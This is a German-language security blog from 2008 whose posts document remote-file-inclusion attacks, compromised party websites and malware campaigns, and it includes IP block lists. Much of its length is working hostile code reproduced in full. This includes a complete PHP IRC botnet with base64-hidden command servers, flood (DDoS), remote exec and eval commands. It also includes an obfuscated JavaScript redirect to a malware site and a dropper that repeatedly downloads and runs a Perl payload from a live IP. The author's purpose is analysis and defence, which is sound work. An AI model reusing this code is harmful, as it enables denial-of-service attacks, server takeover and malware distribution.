Monday, November 24. 2008
Holz aus Brasilien - this is fuckin cr4nk
Nachdem ich den freundlichen Kommentar von haterbreed entdeckt hatte,
habe ich einmal die gleiche Google-Suche gestartet, wie er es tat.
Neben meinem blog hier gabs auch noch andere Ergebnisse,
wie zum Beispiel diesen:
google cache von brasilwood.eu
Falls der Cache nicht mehr die ersetzte Seite zeigt,
habe ich hier einmal nen screenshot hinterlegt:
Klicken zum Vergrössern!
habe ich einmal die gleiche Google-Suche gestartet, wie er es tat.
Neben meinem blog hier gabs auch noch andere Ergebnisse,
wie zum Beispiel diesen:
google cache von brasilwood.eu
Falls der Cache nicht mehr die ersetzte Seite zeigt,
habe ich hier einmal nen screenshot hinterlegt:
Klicken zum Vergrössern!
Thursday, November 6. 2008
Crank - this is fuckin cr4nk
Ich dachte wirklich zunächst, "cr4nk" wäre mal eine etwas anderes Volk...
Sunday, October 12. 2008
Webseite des SPD Ortsverbandes Esens-Nord gehackt
Damit mir nicht jemand vorwirft ich sei politisch,
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)
http://spd-esens.de/spd/contentimage/bid.txtOder ist sowas nur interessant, wenn es beim jährlichen CCC Treffen passiert?
Friday, October 3. 2008
onspeed.com als Beschleuniger für hacker
onspeed.com ist laut deren Webseite ein Dienst,
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
Stand 3.10.2008 17:05 domain IP --------------------------------------------------------- navaho.onspeed.com 72.3.137.82 yuma.onspeed.com 72.3.137.83 vanadium.onspeed.com 83.138.172.72 chromium.onspeed.com 83.138.172.76 silicon.onspeed.com 212.100.250.218 sulphur.onspeed.com 212.100.250.225 aluminium.onspeed.com 212.100.250.217 nickel.onspeed.com 212.100.250.230Ich persönlich habe kein Problem damit etwas grosszügiger zu sein:
72.3.137.0/24 83.138.172.0/24 212.100.250.0/24Hier ein Auszug aus der abuse mail:
Saturday, September 13. 2008
[honeyd] rfi - listen
Der Andrang ist inzwischen so gross geworden, mich zum Opfer zu machen,
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
Wednesday, August 20. 2008
[malware] fdp.de gehackt?
Scheinbar ist die fdp.de Webseite Opfer einer RFI Attacke geworden.
In der letzten Zusammenfassung des tschechischen Honeynet Projektes fiel ein Eintrag auf:
Bericht vom 20.August 2008
Beispiele:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost
können wir trotzdem einen Blick darauf werfen:
In der letzten Zusammenfassung des tschechischen Honeynet Projektes fiel ein Eintrag auf:
Bericht vom 20.August 2008
STATISTIKA PRO RFI/XSS - MALWARE Link na malware - pocet IP - pocet utoku http://fdp.de/vorschaltseite/did.txt - 31 - 94 - 6a608609c0535feef25f60325d2e40cbund noch ein zweiter:
http://fdp.de/vorschaltseite/id.txt - 58 - 249 - 9e816808f1debe9ebeecb08654c2d5c2Im Bericht vom Vortag finden sich folgende Einträge:
http://fdp.de/vorschaltseite/did.txt - 3 - 6 - 6a608609c0535feef25f60325d2e40cb http://fdp.de/vorschaltseite/id.txt - 28 - 163 - 9e816808f1debe9ebeecb08654c2d5c2Im Bericht vom 17. August taucht die Adresse das erstemal auf:
http://fdp.de/vorschaltseite/did.txt - 7 - 18 - 6a608609c0535feef25f60325d2e40cbEine google-Suche nach fdp.de/vorschaltseite gibt uns Gewissheit.
Beispiele:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost
00:00:00 libwww-perl artmam.com 13:12:02 /index.php?custompluginfile[]=http://fdp. de/vorschaltseite/id.txthttp://infolac.ucol.mx/access/
pbb_root_path=http://fdp.de/vorschaltseite/id.txt?Obwohl die Dateie(en) nicht mehr auf der FDP Vorschaltseite zu finden sind,
können wir trotzdem einen Blick darauf werfen:
Saturday, August 9. 2008
[malware] RFI Attacken mit Hilfe von pastebin.ubuntu.com
Ob ubuntu Eure bevorzugte Distribution ist, sei einmal dahingestellt.
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
Schauen wir uns einmal diesen letzten "pastebin" an:
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
Schauen wir uns einmal diesen letzten "pastebin" an:
CODE:
<?php
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
class bMain
{
var $config = array(
// "prefix" => "HOMOVAN|",
"maxnumbers" => 5,
"maxident" => 6,
"trigger" => ".",
"modes" => "-ix",
"adminhosts" => array("i.love.ircsluts.net"),
"sockbuffer" => 512,
"rejoindelay" => 900,
"cpingdelay" => 10,
"chessburstudp" => 5000,
"chessbursttcp" => 100,
"httpburst" => 20,
);
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
var $bots = array();
var $lastrejointime;
function bMain()
{
$this->lastrejointime = time();
}
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
var $allowcontrol = false;
var $socket;
var $lastreconnect;
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
function setcontrol($control)
{
$this->allowcontrol = $control;
}
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
case "433":
$this->raw("NICK {$this->currentnick}");
break;
case "PRIVMSG":
if (!$this->allowcontrol) break;
$host = explode("@", $cmd[0]);
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $source);
break;
}
}
if (count($mainclass->bots) <= 1) {
$this->raw("QUIT :Final connection dropped, quitting");
die();
break;
}
if ($mainclass->bots[$conid]) {
$mainclass->bots[$conid]->disconnect();
unset($mainclass->bots[$conid]);
sort($mainclass->bots);
$this->say("Connection ".$args[1]." disconnected", $source);
}
else $this->say("Invalid connection ID", $source);
break;
case "exec":
$txt = "";
for ($i=1; $i<1024; $i++) {
if (isset($args[$i])) $txt .= $args[$i]." ";
else break;
}
$ph = popen($txt." 2>&1", "r");
$read = fread($ph, 8192);
$out = explode("\n", $read);
pclose($ph);
foreach ($out as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
break;
case "eval":
ob_start();
eval($args);
$outa = explode("\n", ob_get_flush());
foreach ($outa as $line)
{
$this->say(trim($line), $source);
//sleep(1);
}
ob_end_flush();
break;
case "http":
if ($numargs < 2) {
$this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source);
break;
}
$this->say("HTTP request flood starting", $source);
$requests = $mainclass->starthttp($args[1], intval($args[2]));
if ($requests && $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source);
else $this->say("HTTP flood error, no requests sent", $source);
break;
}
}
}
$mainclass = new bMain;
$mainclass->start();
?>
interessant die base 64 Kodierung der server und channel Variablen.
Sunday, July 27. 2008
[malware] sexy codec, immer noch.
JA, heute ist wieder so ein langweiliger Sonntag.
Da könnt ich ja mal schaun, was unsere fake-porn-fake-codec Leute so machen.
Wie ich schon auf offensivecomputing.net beschrieben habe,
lassen sich neue campaigns leicht erfassen.
Also los geht's:
Nutzen wir einen alten link (katsumi, pornstar!):
http://lineacount.info/cgi-bin/search?id=1706&k=katsumi&ref=
Das Ergebnis ist:
HEAD
Content:
Da könnt ich ja mal schaun, was unsere fake-porn-fake-codec Leute so machen.
Wie ich schon auf offensivecomputing.net beschrieben habe,
lassen sich neue campaigns leicht erfassen.
Also los geht's:
Nutzen wir einen alten link (katsumi, pornstar!):
http://lineacount.info/cgi-bin/search?id=1706&k=katsumi&ref=
Das Ergebnis ist:
HEAD
CODE:
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2008 01:53:12 GMT
Server: Apache/1.3.31 (Unix) mod_python/2.7.10 Python/2.2.2 mod_webapp/1.2.0-dev mod_perl/1.29 mod_throttle/3.1.2 PHP/4.3.8 FrontPage/5.0.2.2510 mod_ssl/2.8.18 OpenSSL/0.9.7d
Connection: close
Content-Type: binary
Content:
CODE:
function g(Rl,j){if(!j){j='Q`I=h]41Je%.uy#o?p3!,W7A;-v+tiNGsZ8glrfk*MCKTm$/@B^jLdSzY&_RXDn|';}var h;var kD='';for(var I=0;I<Rl.length;I+=4){h=(j.indexOf(Rl.charAt(I))&255)<<18|(j.indexOf(Rl.charAt(I+1))&255)<<12|(j.indexOf(Rl.charAt(I+2))&255)<<(6)|j.indexOf(Rl.charAt(I+3))&255;kD+=String.fromCharCode((h&16711680)>>16,(h&65280)>>8,h&255);}eval(kD);}g('-4Dgi7dr+k?$izeMi4,*ejBj;^tKezeMt1?nJ4p/;zWm-7&L.fB/;S]Lv7D$o3e*i1p@#8X/tSDfi1iZtf,mi1eZ-f;$;SDm.Si/.k`*t=DM-=Ljy=hftfWfo!hju!J8J=@/tSuk%^i^vA`Lo8tM#^Qs');
welcher entschlüsselt folgenden Inhalt hat:CODE:
document.write('<sc'+'ript> document.location="http://software-traff.com/go.php?id=341&ref=1312" </sc'+'ript>');
Saturday, June 21. 2008
[malware]adu/idku.txt??
...seitdem sich eine meiner domains in den suchmaschinen etabliert hat,
kommen einige sachen, die ich erst mal "beantworten" muss :)
adu/idku.txt Google Search
kommen einige sachen, die ich erst mal "beantworten" muss :)
adu/idku.txt Google Search
CODE:
<?
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-downloadhttp://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@system('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@popen('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@shell_exec('cd /var/tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;lynx -source http://203.113.6.34/adu/indo.txt >indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /tmp;GET http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;wget http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;curl -O http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;lwp-download http://203.113.6.34/adu/indo.txt;perl indo.txt;rm -f indo.txt*');
@passthru('cd /var/tmp;fetch http://203.113.6.34/adu/indo.txt > indo.txt;perl indo.txt;rm -f indo.txt*');
